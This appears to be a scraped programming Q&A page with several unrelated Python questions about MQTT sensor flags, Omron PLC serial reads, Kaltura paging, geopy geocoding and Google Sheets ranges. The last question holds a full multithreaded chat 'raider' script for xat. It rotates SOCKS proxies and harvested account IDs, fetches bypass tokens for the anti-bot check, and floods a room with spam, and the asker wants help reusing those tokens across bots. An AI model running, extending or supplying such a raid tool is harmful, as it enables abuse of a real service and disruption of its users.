I have the following code that I've been asked to 'tidy up'. At the moment I think its not optimal, so I'd like some advice on how to make it so please.
I have 4 voltages received as MQTT messages (power1,power2 etc.), corresponding to 4 different measuring stations, each of which is a value I append to a new array 'power'. If the values lie between 'Vtrig' and 'Vlow', they are appended to another array 'flags', whose length, when exceeding a certain value (Flag_length), triggers a flag I can send out as an MQTT message, so that way if I get multiple values outside of the required range I'm notified. Otherwise, the array is emptied and we start again.
Here's what I wrote so far:
import smbus
import time
import csv
from datetime import datetime
import paho.mqtt.client as paho
MQTT_HOST = '10.10.20.122'
MQTT_PORT = 1883
MQTT_CLIENT_ID = 'lowerStation'
TOPIC = 'pwrTest/testData'
TOPIC_TOM = 'pwrTest/Error'
TOPICeval = 'pwrTest/testEval'
Vtrig = 12
Vlow = 0.1
Flag_length = 7
flags0=[]
flags1=[]
flags2=[]
flags3=[]
client = paho.Client(MQTT_CLIENT_ID)
client.connect(MQTT_HOST, MQTT_PORT)
# Serial numbers to Volito connected to measureing station, station 1 to 4
SN = [109, 78, 86, 60]
def on_connect(client, userdata, flags, rc):
if rc==0:
print('connected')
else:
print('Bad connection code =', rc)
broker = '10.10.20.122'
client.connect(broker) #connect to broker
client.on_connect = on_connect #bind call back function
print('Connecting to broker', broker)
But this is really the relevant part.
payload = str(power1) + "," + "Station1," + "SN" +str(SN[0])
client.publish(TOPIC, payload)
payload = str(power2) + "," + "Station2," + "SN" +str(SN[1])
client.publish(TOPIC, payload)
payload = str(power3) + "," + "Station3," + "SN" +str(SN[2])
client.publish(TOPIC, payload)
payload = str(power4) + "," + "Station4," + "SN" +str(SN[3])
client.publish(TOPIC, payload)
power = []
power.append(datetime.now().strftime("%d/%m/%Y %H:%M:%S"))
power.append(power1)
power.append(power2)
power.append(power3)
power.append(power4)
for x in power[1:2]:
if x <Vtrig and x> Vlow:
flags0.append(x)
elif x>= Vtrig:
flags0 = []
if len(flags0) > Flag_length:
payload = '5.0,' + "Station1," + "SN" +str(SN[0])
flags0 = []
client.publish(TOPICeval,payload)
for x in power[2:3]:
if x <Vtrig and x> Vlow:
flags1.append(x)
elif x>= Vtrig:
flags1 = []
if len(flags1) > Flag_length:
payload = '5.0,' + "Station2," + "SN" +str(SN[1])
flags1 = []
client.publish(TOPICeval,payload)
for x in power[3:4]:
if x <Vtrig and x> Vlow:
flags2.append(x)
elif x>= Vtrig:
flags2 = []
if len(flags2) > Flag_length:
payload ='5.0,' + "Station3," + "SN" +str(SN[2])
flags2 = []
client.publish(TOPICeval,payload)
for x in power[4:5]:
if x <Vtrig and x> Vlow:
flags3.append(x)
elif x>= Vtrig:
flags3 = []
if len(flags3) > Flag_length:
payload ='5.0,' + "Station4," + "SN" +str(SN[3])
flags3 = []
client.publish(TOPICeval,payload)
print('running')
time.sleep(10)
As you can see I repeat the same code for each entry, is there a better way of writing this in a for loop?
Nice spot on simplification. I think you could do it like this.
Even better you should probably start using functions or debugging your code will be a nightmare in the future.
buffer = {} #a dict but probably other ways to do it
for index,value in enumerate(power):
if value<Vtrig and value>Vlow: #your conditional checks
buffer[index].append(value) #appends to the index of your power list
elif value>= Vtrig: #conditional checks
buffer[index] = [] #clearing the 'flag' list for index
if len(buffer[index])> Flag_length:#your conditional check
payload = '5.0, Station{}, SN{}'.format(index+1,SN[index])
#index from 0 so i think you want + 1 here for station and SN to equal the index
buffer[index] = [] #clearing again
client.publish(TOPICeval,payload) #publishihing whatever you wanted
On another note, consider creating a class and creating functions. Would make your code much more readable.
Related
I have 2 PLCs with serial port. one is mitsubishi Q00Jcpu mc protocol, another is omron hostlink protocol.
I tried to use python pyserial lib to write to the PLC and read response.
But failed, I tried to use a serial tool to test and got nice response,
serial tool success communicate with PLC, I read CIO address start 100 and size 2, it got 12345678, that is a true result.
my code :
import serial
omr = serial.Serial(port='COM4', baudrate=9600, timeout=0.5)
omr.parity=serial.PARITY_EVEN
omr.bytesize = 7
omr.stopbits =2
resp = omr.write(b'\x40\x30\x30\x46\x41\x30\x30\x30\x30\x30\x30\x30\x30\x30\x30\x31\x30\x31\x42\x30\x30\x30\x36\x34\x30\x30\x30\x30\x30\x32\x30\x35\x2a\x0d')
print(resp) # print 34
resp = omr.write(b'#00FA0000000000101B0006400000205*\CR')
print(resp) # print 36
It seems return the len of write data, I tried both hex and ascii, all failed.
I figured it how, the return of serial.write is not the result. If need the response from device, should use read_until(), not sure weather this is a good way, please let me know if you have any suggestions.
Anyway, the class i make, can read the omron PLC by giving different params, hope it can help someone.
DEMO:
import serial
# cmd = '0101B00064000001'
class OMR_SERIAL_TOOL:
def __init__(self,port,baudrate):
self.omr = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
self.omr.parity=serial.PARITY_EVEN
self.omr.bytesize = 7
self.omr.stopbits =2
self.head ='#00FA000000000'
#staticmethod
def get_xor(frame):
res = ord(frame[0])
for i in frame[1:]:
res ^= ord(i)
res = str(res)
if len(res) == 1:
res = '0'+res
return res
def omr_read(self,head,cmd):
xor = OMR_SERIAL_TOOL.get_xor(head+cmd)
self.omr.write('{}{}{}*\r'.format(head,cmd,xor).encode())
resp = self.omr.read_until("\r".encode())
return str(resp[23:-4],encoding='utf-8')
test = OMR_SERIAL_TOOL('COM4',9600)
res = test.omr_read(test.head,cmd='0101B00064000002')
print(res) # 12345678 , which is the correct response
BOOM! VERSION 1.0
import serial
class OMR_SERIAL_TOOL:
def __init__(self,port,baudrate,mode):
self.omr = serial.Serial(port=port, baudrate=baudrate, timeout=0.5)
self.omr.parity=serial.PARITY_EVEN
self.omr.bytesize = 7
self.omr.stopbits =2
# fins mdoe
if mode == 'fins':
self.head ='#00FA000000000'
self.cmd_map = {
"MEMORY_AREA_READ":"0101",
"MEMORY_AREA_WRITE":"0102",
"MEMORY_AREA_FILL":"0103",
"MULTI_MEMORY_AREA_READ":"0104",
"MEMORY_AREA_TRANSFER":"0105"
}
# cs/cj mode
self.io_memory_area_code_map={
"CIO_bit":"30",
"WR_bit":"31",
"HR_bit":"32",
"AR_bit":"33",
"CIO_word":"B0",
"WR_word":"B1",
"HR_word":"B2",
"AR_word":"B3"
}
#staticmethod
def get_xor(frame):
res = ord(frame[0])
for i in frame[1:]:
res ^= ord(i)
res = str(res)
if len(res) == 1:
res = '0'+res
res = str(hex(int(res)))[2:]
upcase_res = ''
for i in res:
if i.isdigit():
upcase_res += i
elif i.isalpha():
upcase_res += i.upper()
if len(upcase_res) == 1:
upcase_res = '0'+upcase_res
return upcase_res
def omr_read(self,cmd,code,address,size):
address = str(hex(address))[2:]
size = str(hex(size))[2:]
while len(address) < 4:
address = '0' + address
while len(size) < 4:
size = '0' + size
frame = self.head+cmd+code+address+'00'+size
xor = OMR_SERIAL_TOOL.get_xor(frame)
#print(frame+xor)
self.omr.write('{}{}*\r'.format(frame,xor).encode())
resp = self.omr.read_until("\r".encode())
return str(resp[23:-4],encoding='utf-8')
omr_client = OMR_SERIAL_TOOL('COM4',9600,'fins')
cmd = omr_client.cmd_map['MEMORY_AREA_READ']
code = omr_client.io_memory_area_code_map['CIO_word']
res = omr_client.omr_read(cmd,code,address=500,size=1)
I tested it good on CIO read, please let me know if you find any bugs.
I'm unable to generate all entries in Kaltura. An ApiException with the message "Unable to generate list. max matches value was reached" (Error: QUERY_EXCEEDED_MAX_MATCHES_ALLOWED) gets triggered.
I tried to work around such issue by setting my sessionPrivileges to disableentitlement
class class_chk_integrity():
client = None
pagesize = 0
def __init__(self,worker_num, progress):
self.pagesize = 30
self.worker_num = worker_num
self.progress = progress
config = KalturaConfiguration(2723521)
config.serviceUrl = "https://www.kaltura.com/"
self.client = KalturaClient(config)
ks = self.client.session.start("KALTURA_ADMIN_SECRET",
"email#email.com",
KalturaPluginsCore.KalturaSessionType.ADMIN,
"KALTURA_PARTNER_ID",
432000,
"disableentitlement")
self.client.setKs(ks)
I also tried to filter based on the id's. However, I can't manage to put the filter.idNotIn to work properly.
def get_total_reg(self, cont, lastEntryIds, lastEntryCreatedAt):
filter = KalturaPluginsCore.KalturaBaseEntryFilter()
if lastEntryIds != "":
filter.idNotIn = lastEntryIds
filter.orderBy = KalturaBaseEntryOrderBy.CREATED_AT_DESC
pager = KalturaPluginsCore.KalturaFilterPager()
pageIndex = 1
entriesGot = 0
pager.pageSize = self.pagesize
pager.setPageIndex = pageIndex
result = self.client.baseEntry.list(filter, pager)
totalCount = result.totalCount
if totalCount > 10000:
totalCount = 9970
if totalCount <= 0:
cont = False
while entriesGot < totalCount:
pager.pageSize = self.pagesize
pageIndex += 1
pager.pageIndex = pageIndex
result = self.client.baseEntry.list(filter, pager)
entriesGot += len(result.objects)
for e in result.objects:
if lastEntryIds == "":
lastEntryIds.append(e.id)
else:
lastEntryIds.append(e.id)
lastEntryCreatedAt = e.createdAt
return result.totalCount, self.pagesize, cont, lastEntryIds, lastEntryCreatedAt
This is my how I'm calling the functions
if __name__ == '__main__':
try:
log = _ServiceUtils.log()
log.setup('all', 'integrity')
cont = True
lastEntryIds = []
lastEntryCreatedAt = 0
while cont is True:
kmc = class_chk_integrity(0,0)
kmc_total_reg, kmc_page_size, cont, lastEntryIds, lastEntryCreatedAt = kmc.get_total_reg(cont, lastEntryIds, lastEntryCreatedAt)
interval = 10
max_threads = math.ceil(kmc_total_reg / (interval * kmc_page_size))
# max_threads = 1
threads_list = []
print('TOTAL REG : %s | PAGE_SIZE : %s | INTERVAL : %s | THREADS : %s' % (kmc_total_reg,kmc_page_size,interval,max_threads))
progress = class_progress_thread(max_threads)
for index in range(0,max_threads):
page_ini = index * interval
page_end = index * interval + interval
progress.add_worker_progress(index,datetime.now())
threads_list.append(threading.Thread(target=thread_chk_integrity, args=(index, log, index * interval + 1,index * interval + interval,progress)))
threads_list.append(threading.Thread(target=thread_output_progress, args=(progress,max_threads)))
for thread in threads_list:
thread.start()
for thread in threads_list:
thread.join()
while not progress.stop(): time.sleep(30)
except KeyboardInterrupt:
try:
sys.exit(0)
except SystemExit:
os._exit(0)
I'd appreciate any help with this.
Thank you for your attention.
if totalCount > 10000:
totalCount = 9970
I'm curious to know why you are changing the totalCount this way.
Short answer - paging works as long as the result set is up to 10K.
To work around that, sort the result by creation date (as you did), and when you get to 10K, start with a new search where the created_at date in the filter is the last value you got in the previous search. Reset your paging of course.
I have a list of addresses and I just wind up getting a Kill 9 error when I try to add coordinates.
Is it timing out? I added sleep times to prevent it .
I get this error Killed: 9
def do_geocode(Nominatim, address):
time.sleep(3)
try:
return Nominatim.geocode(address)
except GeocoderTimedOut:
return do_geocode(Nominatim,address)
def addCoordinates(businessList):
businessList[0] = ["pageNum","entryNum","name","address","tagOne","tagTwo","tagThree","geoAddress","appendedLocation","latitude","longitude","key"]
geolocator = Nominatim(timeout=None)
z = 0
i=1
while i < len(businessList):
longitude = ""
latitude = ""
geoLocation = ""
geoAddress = ""
entry = []
appendedLocation = (businessList[i][3] + ", San Francisco")
geoLocation = do_geocode(geolocator, appendedLocation)
if geoLocation is not None:
geoAddress = geoLocation.address
latitude = geoLocation.latitude
longitude = geoLocation.longitude
entry = [geoAddress, appendedLocation, str(latitude), str(longitude)]
j=0
while j < len(entry):
businessList[i] += [entry[j]]
j+=1
print("coordinates added")
z +=1
print(z)
i+=1
Killed: 9 probably means that your Python script has been terminated by something in your OS (perhaps OOM killer?). Ensure your script doesn't occupy the whole available memory of the machine.
For geopy specifically I'd suggest to take a look at the RateLimiter class. Also note that you need to specify your unique User Agent when using Nominatim (which is explained in the Nominatim class docs). You'd get something like this:
from geopy.extra.rate_limiter import RateLimiter
def addCoordinates(businessList):
businessList[0] = ["pageNum","entryNum","name","address","tagOne","tagTwo","tagThree","geoAddress","appendedLocation","latitude","longitude","key"]
geolocator = Nominatim(user_agent="specify_your_app_name_here", timeout=20)
geocode = RateLimiter(
geolocator.geocode,
min_delay_seconds=3.0,
error_wait_seconds=3.0,
swallow_exceptions=False,
max_retries=10,
)
z = 0
i=1
while i < len(businessList):
longitude = ""
latitude = ""
geoLocation = ""
geoAddress = ""
entry = []
appendedLocation = (businessList[i][3] + ", San Francisco")
geoLocation = geocode(appendedLocation)
if geoLocation is not None:
geoAddress = geoLocation.address
latitude = geoLocation.latitude
longitude = geoLocation.longitude
entry = [geoAddress, appendedLocation, str(latitude), str(longitude)]
j=0
while j < len(entry):
businessList[i] += [entry[j]]
j+=1
print("coordinates added")
z +=1
print(z)
i+=1
Through this code I've update a bunch of rows in Google Spreadsheet.
The request goes well and returns me the updatedRange below.
result = service.spreadsheets().values().append(
spreadsheetId=spreadsheetId,
range=rangeName,
valueInputOption="RAW",
insertDataOption="INSERT_ROWS",
body=body
).execute()
print(result)
print("Range updated")
updateRange = result['updates']['updatedRange']
Now I would like to do a batchUpdate request to set the formatting or set a protected range, but those API require a range specified as startRowIndex, endRowIndex and so on.
How could I retrieve the rows index from the updatedRange?
Waiting for a native or better answer, I'll post a function I've created to translate a namedRange into a gridRange.
The function is far from perfect and does not translate the sheet name to a sheet id (I left that task to another specific function), but accept named ranges in the form:
sheet!A:B
sheet!A1:B
sheet!A:B5
sheet!A1:B5
Here is the code
import re
def namedRange2Grid(self, rangeName):
ascii_uppercase = 'ABCDEFGHIJKLMNOPQRSTUVWXYZ'
match = re.match(".*?\!([A-Z0-9]+)\:([A-Z0-9]+)", rangeName)
if match:
start = match.group(1)
end = match.group(2)
matchStart = re.match("([A-Z]{1,})([1-9]+){0,}", start)
matchEnd = re.match("([A-Z]{1,})([1-9]+){0,}", end)
if matchStart and matchEnd:
GridRange = {}
letterStart = matchStart.group(1)
letterEnd = matchEnd.group(1)
if matchStart.group(2):
numberStart = int(matchStart.group(2))
GridRange['startRowIndex'] = numberStart - 1
if matchEnd.group(2):
numberEnd = int(matchEnd.group(2))
GridRange['endRowIndex'] = numberEnd
i = 0
for l in range(0, len(letterStart)):
i = i + (l * len(ascii_uppercase))
i = i + ascii_uppercase.index(letterStart[l])
GridRange['startColumnIndex'] = i
i = 0
for l in range(0, len(letterEnd)):
i = i + (l * len(ascii_uppercase))
i = i + ascii_uppercase.index(letterEnd[l])
GridRange['endColumnIndex'] = i + 1
return GridRange
See the code below, "J2".
In the xml j2 as you can see "Y=getY" it's doing that for each id+pproxy(multithreading)
Now what I want is, I want it to continue changing id and k2= but use the same Y for only 3 times. Then after that get a new Y and do the same..
So for example
<j2 Y="one value" id="3 multi threads pass trough" k="3 multi threads"
and then after that <j2 Y="new y value because only 3 ids can pass through one Y" id="same again" k="same again">
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
The Y value should be the same while 3 ids pass through it, then when 3 have passed through it, grab a new Y value.
Take a look at this script:
import socket, socks
import xml.etree.ElementTree as tree
import time, random, urllib2
import threading
from itertools import izip
def gB(data,first,last):
x=len(first)
begin = data.find(first) + x
end = data.find(last,begin)
return data[begin:end]
def isInt(buf):
try:
i = int(buf)
return True
except:
return False
def ip(roomname):
if isInt(roomname):
room = roomname
else:
room = gB(urllib2.urlopen('http://xat.com/'+roomname).read(),'FlashVars="id=','&xc=')
room = int(room)
x = urllib2.urlopen('http://xat.com/web_gear/chat/ip.htm?'+str(time.time())).read()
x = tree.fromstring(x)
xSock = x.attrib['xSock'].split(',')
rSock = []
while len(rSock) < 4:
rSock.append(xSock[len(rSock) * 4 + random.randint(0,1)])
return rSock[(room & 96) >> 5],int(10007 + (room % 32)),room
def parseID(auser3):
auser3 = auser3.split('&')
userid = auser3[1].split('=')[1]
k1 = auser3[2].split('=')[1]
k2 = auser3[3].split('=')[1]
return [userid,k1,k2]
return l5
def getY(au, p0, p1, p2, p3, yi):
sock = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.settimeout(10)
sock.connect(("127.0.0.1",1337))
sock.send(au+"_"+p0+"_"+p1+"_"+p2+"_"+p3+"_"+yi)
data = sock.recv(1270)
parse = data.split("\"")
sock.close()
print "Y => "+parse[1]+" L5 => "+parse[3]
return [parse[1], parse[3]]
def raider(a3,p):
info = ip(chat)
try:
socks.setdefaultproxy(socks.PROXY_TYPE_SOCKS4, p[0], int(p[1]))
socket.test = socks.socksocket
xat = socket.test(socket.AF_INET, socket.SOCK_STREAM, socket.SOL_TCP)
xat.settimeout(10)
xat.connect((info[0],int(info[1])))
xat.send('<y r="'+str(info[2])+'" />\0')
bypass = xat.recv(1024)
print "\nRecv --> "+bypass+"\n"
rcv = tree.fromstring(bypass.strip("\0"))
if 'i' not in rcv.attrib:
raise Exception("YUP")
import pprint
pprint.pprint(a3)
uid = a3[0]
k = a3[1]
if 'au' in rcv.attrib:
Y = getY(rcv.attrib["au"], rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" Y="'+str(Y[0])+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend [Bypass] --> "+j2+"\n"
else:
Y = getY(str(0), rcv.attrib["p"].split("_")[0],rcv.attrib["p"].split("_")[1],rcv.attrib["p"].split("_")[2],rcv.attrib["p"].split("_")[3], rcv.attrib["i"])
j2 = str('<j2 cb="'+rcv.attrib["c"]+'" l5="'+str(Y[1]).strip()+'" l4="583" l3="463" l2="0" q="1" y="'+rcv.attrib['i']+'" k="'+k+'" k3="0" p="0" c="'+str(info[2])+'" f="0" u="'+str(uid)+'" d0="0" n=" " a="0" h="" v="0" />\0')
xat.send(j2)
print "\nSend --> "+j2+"\n"
while 1:
time.sleep(1)
xat.send('<m t=" | XAT IS CORRUPT | " u="'+uid+'" />\0')
except:
pass
chat = raw_input("Chat to raid: ")
ids = [i.strip() for i in open('ids.txt','r')]
proxies = [i.strip() for i in open('socks.txt','r')]
for (i,j) in izip(ids,proxies):
i = parseID(i)
j = j.split(':')
threading.Thread(target=raider,args=(i,j)).start()